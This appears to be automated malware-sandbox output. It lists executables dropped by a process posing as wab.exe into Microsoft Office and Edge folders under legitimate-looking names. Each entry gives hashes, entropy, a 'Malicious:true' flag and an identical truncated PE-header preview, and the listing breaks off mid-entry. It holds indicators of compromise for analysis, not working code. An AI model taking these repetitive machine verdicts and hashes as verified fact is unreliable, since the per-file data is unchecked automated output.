                                                                                                SHA-512:E2B300286DBE9F7A5635BFEE07C03D2E5FC21A9B658CB5E69ABB0A071A15F7B9781C37B9E64C935F8AD54D205AA221D7D679C9D7D1C062426795C279FC5245A9
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1082008
                                                                                                Entropy (8bit):3.688463156686676
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                                                MD5:3A47AB68F40340B1078860C968FE8489
                                                                                                SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                                                SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                                                SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):105440
                                                                                                Entropy (8bit):5.4479881956053084
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:sEl9bbSVh7VWYOzL49oWQrkw1jL9zxwKeL9zgt5tjTh7D9:sEl9bbS3VoVjhzxwKehzgt5t1D
                                                                                                MD5:D1346C4098D16AC440D5665B99AD4299
                                                                                                SHA1:08EF1AC534221589574D4EA2FCD222CB099680DC
                                                                                                SHA-256:B8F1B885A5DEDF6893C175CFBA736CDAD9065EF21DD0CDB9BF692E190939657E
                                                                                                SHA-512:4F44966E22DEAAD0597A2EF3A0BDB73228D5AD4BE2DF28B9163A3148AC7F11BD322B71198B1FC9281229C03BA0566ADB9D43DE4E390C460EAF3922B8BFDE34A9
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):537536
                                                                                                Entropy (8bit):4.820102239387087
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkHPMMRMMMmMMMvMMMwMMMNMMMWMMM3MMsewVOOMzMMvMMOMMMJMM2MMQM6k7uD:TwVR6V7byjUWAZyVVdz8eEdGo
                                                                                                MD5:1C214A282C02A2210D46E12AD1644AF9
                                                                                                SHA1:4BA7AB5B9869DA21718783ACF5890F5536C75673
                                                                                                SHA-256:FF47F769CFFF7BC22EFDC90931AA634879F761EE5D8CDF421062405D0460CE88
                                                                                                SHA-512:9260337144393E67C25B28042C25C473117E2E8ED58D16B152D942CA8445DE7D7ECEB4AA7C13CCAFE7C062EC9C872BB3022260061233C30D90DE6F324D417EFE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1271952
                                                                                                Entropy (8bit):4.010875755285499
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkj3ppPpNpDpspp/pCp0pmppdpspppRppMpLp0ppppbpQp2pphpSpXpQppaplpG:TKQSNdhnSzv
                                                                                                MD5:9DE7FBDFAAFCC0160D5681DF12BB69D6
                                                                                                SHA1:4FA77F76857F535B821279F049B790A51E9A8BDB
                                                                                                SHA-256:1AA9AFEA2C76C14A0E0079F3985BF54A7FCFB63E4978FE2520BC291A235F6CE1
                                                                                                SHA-512:A8E168D8564892C8D9CDD30C2B7FF38DA77F5B4088861D6169E9810C423FE90C41FDBB2E124849B266944401E4ECF28A35361B2E89D738567028E2F2F835F3A3
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4099760
                                                                                                Entropy (8bit):3.693585524111332
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:IBKs7fvZIFpCYVIVN2mGsb8HtVLaHw3j4cLbUBRjLFP29DyZbT9gb/m06aCzE6h9:IBKszX0FjOeblHiled/k
                                                                                                MD5:4FEED17F8FC70D5BB28C4862D6A889F0
                                                                                                SHA1:1F22653E28C40C5E1DCA3359E8D09201F826CADA
                                                                                                SHA-256:2D07C962AFC6E270F04FC82EA4E80D207722AD4064E3B4C3DD58C01FD28C9FD9
                                                                                                SHA-512:7BAA4F2A7B38742A00D879079DC0505A16D49261163FC0BDB21BD2709EC91310F15FA1BA0AD0AF053BDC2F341EB0A7B8AD536A6B2DBA88BA1AEF4D2643871269
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1273488
                                                                                                Entropy (8bit):4.248522979382886
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoFqYvbZthqyEATS583ONoTqzaezuC8zFtxzzqO9uF:/rkt6bZt+ATS583ONo4aezJ8ZfqiA
                                                                                                MD5:EAEADD9008A5081007BD4EC21056B686
                                                                                                SHA1:6E6FAF94275ECD60262A054AFAB6FB2EB9407FB9
                                                                                                SHA-256:5F97D3C8153157B4735B36EA3E6017A8977BF6F094285ADC5F4229490E3DFF64
                                                                                                SHA-512:0E991651B2F43B0DE5D43CE1E13CD20B8127FBE7C730F649097B8F380E19198C48E9AA73B597B8BE6A9A02650E0EE84FC37D5876B6A5C0A85551E03BB76AFD90
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):124056
                                                                                                Entropy (8bit):5.162520482821961
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
                                                                                                MD5:3FE3567269EE2A38998100DD56D0C35A
                                                                                                SHA1:273677012FE63C88B051D56028DD6915167FBCE5
                                                                                                SHA-256:DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
                                                                                                SHA-512:00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2970664
                                                                                                Entropy (8bit):3.820583432588951
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2d0qVmvzC1SvXKo3NzbsZ6DdIAZcbEcofUnpfRII8Lp9qgN3WJp0Rf5NGpHsh:v/V/CfDhNG5sMXjjzmEPoL
                                                                                                MD5:E9C85E1FA1B8589A48F3EB64AC2AEF55
                                                                                                SHA1:79FC306650CA197E7EAD24B543C648A05F2135A7
                                                                                                SHA-256:68177C8014C778BD17E522F2BE6FE4EC0D8C81BA3B99B2A7EF9787CFA13D8778
                                                                                                SHA-512:DD6074E277BDB8C32F60C4D5B597A2765B302C528C83FA7C9241172376734CC4B192F4B51FBD49DF3DCCA402D250C1F5A9A4F629F1EE945F0A480ACF60D26774
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3531712
                                                                                                Entropy (8bit):3.7529139446179247
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkmKGOKsuWoZ65B/SRDF7eYECYK6QojSgQojS+E1c9zvWiYwOsqE1c93se1jLvI:psSR7PYKzz38YwZItvsDu7DbDhRAUzHW
                                                                                                MD5:99E2EFC53DBFF45C58BD02DE092DA361
                                                                                                SHA1:23D1B97242F3ABE6A2FA2760979E685CE6C0E2A4
                                                                                                SHA-256:75AA16261BB138BB189DCED02C4F2513B1708A34EF6D32DCA7488F274C12C848
                                                                                                SHA-512:1BFF3410DB57ACAFA690187E5F8FB371BFDB7CF98A5CBA8CE994A3F5C3772343B29638B977C498DB665F6AA2A6339846D2CB999E9A34F68730E327831B0F219D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4319272
                                                                                                Entropy (8bit):3.79026092720144
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:lmRfvlTZY/C3ul0ywb/uXMo+YJ7M41zXLWIB:l+6M+595B
                                                                                                MD5:27172A2CB05C40580B9017E397CFEB83
                                                                                                SHA1:F6BEE6DB343B8872D2A7C76257634DD19D7C7D79
                                                                                                SHA-256:4723D994C08DD93D23FEAA220B856AF02E1321E03195AFD52556DAF0405BFE32
                                                                                                SHA-512:DE7C44A923213B546719B4FAC292E1A4FE3F986578B8AC694BA5AF0F6BB463308434C3AE37D098F126558EE09FBCA39F6D85B4FB87694C63A789E4A50359861C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1082008
                                                                                                Entropy (8bit):3.688463156686676
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                                                MD5:3A47AB68F40340B1078860C968FE8489
                                                                                                SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                                                SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                                                SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1082008
                                                                                                Entropy (8bit):3.688463156686676
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                                                MD5:3A47AB68F40340B1078860C968FE8489
                                                                                                SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                                                SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                                                SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1082008
                                                                                                Entropy (8bit):3.688463156686676
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                                                MD5:3A47AB68F40340B1078860C968FE8489
                                                                                                SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                                                SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                                                SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1082008
                                                                                                Entropy (8bit):3.688463156686676
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                                                MD5:3A47AB68F40340B1078860C968FE8489
                                                                                                SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                                                SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                                                SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):582184
                                                                                                Entropy (8bit):6.307656763450446
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:RLWET8DS698nGX2OduCwUJWh/JmmS3DAjqnkrzFoEh+vMKC239YUFgBdQ/:RLxT8DhyiLduCe/lSpn6zOvYUFg4/
                                                                                                MD5:8E107EC5C05E14ADBD1E438D34E95933
                                                                                                SHA1:24886C632652861525F572C7BF712C5EA77FA528
                                                                                                SHA-256:C22DC2815FC5A8EA00A8E6C24369DFFC739E40D70C855E8D0CC4FC880852C1C9
                                                                                                SHA-512:E39FFD9CDB5606E18F8FE9ABBB7D8B4EE541E6930B60E9726531706252FC403E9A44EF16143DC23B4C3ABCCBF6026FE5C0F5B6A2470F8DBB042F5FCF1B165C1E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3837992
                                                                                                Entropy (8bit):6.430735070062025
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:nB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EK:7HzorVmr2FkRpdJYolA
                                                                                                MD5:2F12C8B3D0AD5544C44A027661513F42
                                                                                                SHA1:ECEE87DEE3CBC301B9667EE8D4E71B44ACD6E1C0
                                                                                                SHA-256:80A2436A6A0D526D1A194CF0FD93704BB00DD853CC75882F007FD1FD1634E92D
                                                                                                SHA-512:686A0711379700973F8C63F3AE163D5302AE770DAF8AD64D1FB405C254524D8534892C65EB6686D89D4A4BC27C2CE142F1FB14E46B55F1EE8E190405E2949742
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):161832
                                                                                                Entropy (8bit):5.761346604218296
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkl2VSd2ga8KActASiZAkXS1xU5M3XgcoT0cs4qIm6Y6:5VSktVjv3Xg5T0FIY6
                                                                                                MD5:547C9C694BBBB41A9D14ACB071FD2655
                                                                                                SHA1:CFAB946D63B2FD3AD9B25A7C24F43FBDCDFCB66D
                                                                                                SHA-256:B4EAE61AE843F58EB2F4A30FFEC9E818806A15D0B897F4939232930600AC6F32
                                                                                                SHA-512:EE25C544B05408FDD1C42396FEEDC734E2A966FD173BEBCC56995D86914F183F2487791C1204157032648AB26F4BF7A161212D173371395BC974DE30CE02F556
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1827880
                                                                                                Entropy (8bit):6.514076024677014
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:phDdVrQwm5ztlU0A7fMAHmpmZ3QXE/0/lVaLpmasGvP0:phDdVrQ95RW0Y9HyWQXE/09Val0GE
                                                                                                MD5:F89BA0EA3E9D573B68F776CDF7F7CDD7
                                                                                                SHA1:CAE2E1EA681B990AC9E14D5DD7224A69DCDC134D
                                                                                                SHA-256:C2338FC4DD77DF806830471324BEFB0C8BF90042EC166A04B733F3B1174291DB
                                                                                                SHA-512:8E2D6C493B6C955B867F52795232CAA33CE95A5D615F834AFDBC09B12750E23C03A771C0C4190AF00958B5E449030B2A221DCE4955A3AA241729DB60237AADA4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1297448
                                                                                                Entropy (8bit):6.477378890661513
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:BdoA0Eh2XptoQZRuefMYR6RrAJU9CsxmMocSipEylqFfouDMA+nkSddSDBDIq:B70E0ZCQZMip6Rrt9RoctGfmdd0
                                                                                                MD5:DF4B1DE5F9CEE22E7C47D5023ED73F23
                                                                                                SHA1:38329123EEC0496BBE07B3B274F139E809705943
                                                                                                SHA-256:0EF0AD16A9F6E054F3FDDE1DD2984DFCE8F4466F44CA616C78B03577A6ACEC1B
                                                                                                SHA-512:8207A1DC020412B5A924665043AF347437825E128122DC93EEF4ED7122D98E0695183637F4D56EDE014EF95235D659A35B5011FB4D701867742090BD3F4308AD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4251688
                                                                                                Entropy (8bit):6.49452169775478
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                                                MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                                                SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                                                SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
